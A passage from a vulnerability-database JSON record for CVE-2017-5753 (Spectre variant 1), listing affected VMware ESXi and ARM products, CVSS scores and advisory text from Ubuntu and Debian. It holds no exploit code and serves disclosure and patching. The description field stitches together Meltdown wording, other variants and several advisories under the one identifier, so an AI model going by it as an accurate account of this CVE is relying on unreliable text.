                "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.0:600-201510401:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.0:600-201511401:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.0:600-201601101:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.0:600-201601102:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.0:600-201601401:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.0:600-201601402:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.0:600-201601403:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.0:600-201601404:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.0:600-201601405:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.0:600-201602401:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.0:600-201603101:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.0:600-201603102:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.0:600-201603201:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.0:600-201603202:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.0:600-201603203:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.0:600-201603204:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.0:600-201603205:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.0:600-201603206:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.0:600-201603207:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.0:600-201603208:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.0:600-201605401:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.0:600-201608101:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.0:600-201608401:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.0:600-201608402:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.0:600-201608403:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.0:600-201608404:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.0:600-201608405:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.0:600-201610410:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.0:600-201611401:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.0:600-201611402:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.0:600-201611403:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.0:600-201702101:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.0:600-201702102:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.0:600-201702201:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.0:600-201702202:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.0:600-201702203:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.0:600-201702204:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.0:600-201702205:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.0:600-201702206:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.0:600-201702207:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.0:600-201702208:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.0:600-201702209:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.0:600-201702210:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.0:600-201702211:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.0:600-201702212:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.0:600-201703401:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.0:600-201706101:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.0:600-201706102:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.0:600-201706103:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.0:600-201706401:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.0:600-201706402:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.0:600-201706403:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.0:600-201710301:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.5:-:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.5:650-201701001:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.5:650-201703001:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.5:650-201703002:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.5:650-201704001:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.5:650-201707101:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.5:650-201707102:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.5:650-201707103:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.5:650-201707201:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.5:650-201707202:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.5:650-201707203:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.5:650-201707204:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.5:650-201707205:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.5:650-201707206:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.5:650-201707207:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.5:650-201707208:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.5:650-201707209:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.5:650-201707210:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.5:650-201707211:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.5:650-201707212:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.5:650-201707213:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.5:650-201707214:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.5:650-201707215:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.5:650-201707216:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.5:650-201707217:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.5:650-201707218:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.5:650-201707219:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.5:650-201707220:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.5:650-201707221:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.5:650-201710001:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.5:650-201712001:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:arm:cortex-a77_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:arm:cortex-a77:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:arm:cortex-a78_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:arm:cortex-a78:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:arm:cortex-a78ae_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:arm:cortex-a78ae:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:arm:neoverse_n1_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:arm:neoverse_n1:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:arm:neoverse_n2_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:arm:neoverse_n2:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:arm:cortex-x1_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:arm:cortex-x1:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2017-5753"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Red Hat",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "145718"
      },
      {
        "db": "PACKETSTORM",
        "id": "145641"
      },
      {
        "db": "PACKETSTORM",
        "id": "145666"
      },
      {
        "db": "PACKETSTORM",
        "id": "146315"
      },
      {
        "db": "PACKETSTORM",
        "id": "145635"
      }
    ],
    "trust": 0.5
  },
  "cve": "CVE-2017-5753",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "MEDIUM",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "NONE",
            "baseScore": 4.7,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 3.4,
            "impactScore": 6.9,
            "integrityImpact": "NONE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "MEDIUM",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:L/AC:M/Au:N/C:C/I:N/A:N",
            "version": "2.0"
          },
          {
            "accessComplexity": "MEDIUM",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "CNVD",
            "availabilityImpact": "NONE",
            "baseScore": 4.7,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 3.4,
            "id": "CNVD-2018-00304",
            "impactScore": 6.9,
            "integrityImpact": "NONE",
            "severity": "MEDIUM",
            "trust": 0.6,
            "vectorString": "AV:L/AC:M/Au:N/C:C/I:N/A:N",
            "version": "2.0"
          },
          {
            "accessComplexity": "MEDIUM",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "NONE",
            "baseScore": 4.7,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 3.4,
            "id": "VHN-113956",
            "impactScore": 6.9,
            "integrityImpact": "NONE",
            "severity": "MEDIUM",
            "trust": 0.1,
            "vectorString": "AV:L/AC:M/AU:N/C:C/I:N/A:N",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "HIGH",
            "attackVector": "LOCAL",
            "author": "NVD",
            "availabilityImpact": "NONE",
            "baseScore": 5.6,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 1.1,
            "impactScore": 4.0,
            "integrityImpact": "NONE",
            "privilegesRequired": "LOW",
            "scope": "CHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N",
            "version": "3.1"
          }
        ],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2017-5753",
            "trust": 1.0,
            "value": "MEDIUM"
          },
          {
            "author": "CNVD",
            "id": "CNVD-2018-00304",
            "trust": 0.6,
            "value": "MEDIUM"
          },
          {
            "author": "VULHUB",
            "id": "VHN-113956",
            "trust": 0.1,
            "value": "MEDIUM"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2018-00304"
      },
      {
        "db": "VULHUB",
        "id": "VHN-113956"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-5753"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Systems with microprocessors utilizing speculative execution and branch prediction may allow unauthorized disclosure of information to an attacker with local user access via a side-channel analysis. Two vulnerabilities are identified, known as \"Variant 3a\" and \"Variant 4\". CPUhardware is a set of firmware that runs in the CPU (Central Processing Unit) for managing and controlling the CPU. The Meltdown vulnerability exists in the CPU processor core, which \\\"melts\\\" the security boundary implemented by hardware, allowing low-privileged user-level applications to \\\"cross-border\\\" access to system-level memory, causing data leakage. Multiple CPU Hardware are prone to an information-disclosure vulnerability. \nAttackers can exploit this issue to obtain sensitive information that may aid in further attacks. The following products and versions are affected: ARM Cortex-R7; Cortex-R8; Cortex-A8; Cortex-A9; Cortex-A12; Xeon CPU E5-1650 v3, v2, v4; Xeon E3-1265l v2, v3, v4 ; Xeon E3-1245 v2, v3, v5, v6 versions; Xeon X7542, etc. Relevant releases/architectures:\n\nImage Updates for RHV-H - noarch\n\n3. These\npackages include redhat-release-virtualization-host, ovirt-node, and\nrhev-hypervisor. RHVH features a Cockpit user interface for\nmonitoring the host\u0027s resources and performing administrative tasks. \n==========================================================================\nUbuntu Security Notice USN-3540-2\nJanuary 23, 2018\n\nlinux-lts-xenial, linux-aws vulnerabilities\n==========================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 14.04 LTS\n\nSummary:\n\nSeveral security issues were addressed in the Linux kernel. This update provides the corresponding updates for the\nLinux Hardware Enablement (HWE) kernel from Ubuntu 16.04 LTS for\nUbuntu 14.04 LTS. This flaw is known as Spectre. \n(CVE-2017-5715, CVE-2017-5753)\n\nUSN-3522-2 mitigated CVE-2017-5754 (Meltdown) for the amd64\narchitecture in the Linux Hardware Enablement (HWE) kernel from Ubuntu\n16.04 LTS for Ubuntu 14.04 LTS. This flaw is known as Meltdown. (CVE-2017-5754)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 14.04 LTS:\n  linux-image-4.4.0-1011-aws      4.4.0-1011.11\n  linux-image-4.4.0-111-generic   4.4.0-111.134~14.04.1\n  linux-image-4.4.0-111-lowlatency  4.4.0-111.134~14.04.1\n  linux-image-4.4.0-111-powerpc-e500mc  4.4.0-111.134~14.04.1\n  linux-image-4.4.0-111-powerpc-smp  4.4.0-111.134~14.04.1\n  linux-image-4.4.0-111-powerpc64-emb  4.4.0-111.134~14.04.1\n  linux-image-4.4.0-111-powerpc64-smp  4.4.0-111.134~14.04.1\n  linux-image-aws                 4.4.0.1011.11\n  linux-image-generic-lts-xenial  4.4.0.111.95\n  linux-image-lowlatency-lts-xenial  4.4.0.111.95\n  linux-image-powerpc-e500mc-lts-xenial  4.4.0.111.95\n  linux-image-powerpc-smp-lts-xenial  4.4.0.111.95\n  linux-image-powerpc64-emb-lts-xenial  4.4.0.111.95\n  linux-image-powerpc64-smp-lts-xenial  4.4.0.111.95\n\nPlease note that fully mitigating CVE-2017-5715 (Spectre Variant 2)\nrequires corresponding processor microcode/firmware updates or,\nin virtual environments, hypervisor updates. Ubuntu is working with Intel and AMD to provide\nfuture microcode updates that implement IBRS and IBPB as they are made\navailable. Ubuntu users with a processor from a different vendor should\ncontact the vendor to identify necessary firmware updates. Ubuntu\nwill provide corresponding QEMU updates in the future for users of\nself-hosted virtual environments in coordination with upstream QEMU. \nUbuntu users in cloud environments should contact the cloud provider\nto confirm that the hypervisor has been updated to expose the new\nCPU features to virtual machines. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA512\n\n- -------------------------------------------------------------------------\nDebian Security Advisory DSA-4187-1                   security@debian.org\nhttps://www.debian.org/security/                            Ben Hutchings\nMay 01, 2018                          https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage        : linux\nCVE ID         : CVE-2015-9016 CVE-2017-0861 CVE-2017-5715 CVE-2017-5753\n                 CVE-2017-13166 CVE-2017-13220 CVE-2017-16526 CVE-2017-16911\n                 CVE-2017-16912 CVE-2017-16913 CVE-2017-16914 CVE-2017-18017\n                 CVE-2017-18203 CVE-2017-18216 CVE-2017-18232 CVE-2017-18241\n                 CVE-2018-1066 CVE-2018-1068 CVE-2018-1092 CVE-2018-5332\n                 CVE-2018-5333 CVE-2018-5750 CVE-2018-5803 CVE-2018-6927\n                 CVE-2018-7492 CVE-2018-7566 CVE-2018-7740 CVE-2018-7757\n                 CVE-2018-7995 CVE-2018-8781 CVE-2018-8822 CVE-2018-1000004\n                 CVE-2018-1000199\n\nSeveral vulnerabilities have been discovered in the Linux kernel that\nmay lead to a privilege escalation, denial of service or information\nleaks. \n\nCVE-2015-9016\n\n    Ming Lei reported a race condition in the multiqueue block layer\n    (blk-mq).  On a system with a driver using blk-mq (mtip32xx,\n    null_blk, or virtio_blk), a local user might be able to use this\n    for denial of service or possibly for privilege escalation. \n\nCVE-2017-0861\n\n    Robb Glasser reported a potential use-after-free in the ALSA (sound)\n    PCM core.  We believe this was not possible in practice. \n\nCVE-2017-5715\n\n    Multiple researchers have discovered a vulnerability in various\n    processors supporting speculative execution, enabling an attacker\n    controlling an unprivileged process to read memory from arbitrary\n    addresses, including from the kernel and all other processes\n    running on the system. \n\n    This specific attack has been named Spectre variant 2 (branch\n    target injection) and is mitigated for the x86 architecture (amd64\n    and i386) by using the \"retpoline\" compiler feature which allows\n    indirect branches to be isolated from speculative execution. \n\nCVE-2017-5753\n\n    Multiple researchers have discovered a vulnerability in various\n    processors supporting speculative execution, enabling an attacker\n    controlling an unprivileged process to read memory from arbitrary\n    addresses, including from the kernel and all other processes\n    running on the system. \n\n    This specific attack has been named Spectre variant 1\n    (bounds-check bypass) and is mitigated by identifying vulnerable\n    code sections (array bounds checking followed by array access) and\n    replacing the array access with the speculation-safe\n    array_index_nospec() function. \n\n    More use sites will be added over time. \n\nCVE-2017-13166\n\n    A bug in the 32-bit compatibility layer of the v4l2 ioctl handling\n    code has been found. Memory protections ensuring user-provided\n    buffers always point to userland memory were disabled, allowing\n    destination addresses to be in kernel space. On a 64-bit kernel a\n    local user with access to a suitable video device can exploit this\n    to overwrite kernel memory, leading to privilege escalation. \n\nCVE-2017-13220\n\n    Al Viro reported that the Bluetooth HIDP implementation could\n    dereference a pointer before performing the necessary type check. \n    A local user could use this to cause a denial of service. \n\nCVE-2017-16526\n\n    Andrey Konovalov reported that the UWB subsystem may dereference\n    an invalid pointer in an error case.  A local user might be able\n    to use this for denial of service. \n\nCVE-2017-16911\n\n    Secunia Research reported that the USB/IP vhci_hcd driver exposed\n    kernel heap addresses to local users. \n\nCVE-2017-16912\n\n    Secunia Research reported that the USB/IP stub driver failed to\n    perform a range check on a received packet header field, leading\n    to an out-of-bounds read.  A remote user able to connect to the\n    USB/IP server could use this for denial of service. \n\nCVE-2017-16913\n\n    Secunia Research reported that the USB/IP stub driver failed to\n    perform a range check on a received packet header field, leading\n    to excessive memory allocation.  A remote user able to connect to\n    the USB/IP server could use this for denial of service. \n\nCVE-2017-16914\n\n    Secunia Research reported that the USB/IP stub driver failed to\n    check for an invalid combination of fields in a received packet,\n    leading to a null pointer dereference.  A remote user able to\n    connect to the USB/IP server could use this for denial of service. \n\nCVE-2017-18017\n\n    Denys Fedoryshchenko reported that the netfilter xt_TCPMSS module\n    failed to validate TCP header lengths, potentially leading to a\n    use-after-free.  If this module is loaded, it could be used by a\n    remote attacker for denial of service or possibly for code\n    execution. \n\nCVE-2017-18203\n\n    Hou Tao reported that there was a race condition in creation and\n    deletion of device-mapper (DM) devices.  A local user could\n    potentially use this for denial of service. \n\nCVE-2017-18216\n\n    Alex Chen reported that the OCFS2 filesystem failed to hold a\n    necessary lock during nodemanager sysfs file operations,\n    potentially leading to a null pointer dereference.  A local user\n    could use this for denial of service. \n\nCVE-2017-18232\n\n    Jason Yan reported a race condition in the SAS (Serial-Attached\n    SCSI) subsystem, between probing and destroying a port.  This\n    could lead to a deadlock.  A physically present attacker could\n    use this to cause a denial of service. \n\nCVE-2017-18241\n\n    Yunlei He reported that the f2fs implementation does not properly\n    initialise its state if the \"noflush_merge\" mount option is used. \n    A local user with access to a filesystem mounted with this option\n    could use this to cause a denial of service. \n\nCVE-2018-1066\n\n    Dan Aloni reported to Red Hat that the CIFS client implementation\n    would dereference a null pointer if the server sent an invalid\n    response during NTLMSSP setup negotiation.  This could be used\n    by a malicious server for denial of service. \n\nCVE-2018-1068\n\n    The syzkaller tool found that the 32-bit compatibility layer of\n    ebtables did not sufficiently validate offset values. On a 64-bit\n    kernel, a local user with the CAP_NET_ADMIN capability (in any user\n    namespace) could use this to overwrite kernel memory, possibly\n    leading to privilege escalation. Debian disables unprivileged user\n    namespaces by default. \n\nCVE-2018-1092\n\n    Wen Xu reported that a crafted ext4 filesystem image would\n    trigger a null dereference when mounted.  A local user able\n    to mount arbitrary filesystems could use this for denial of\n    service. 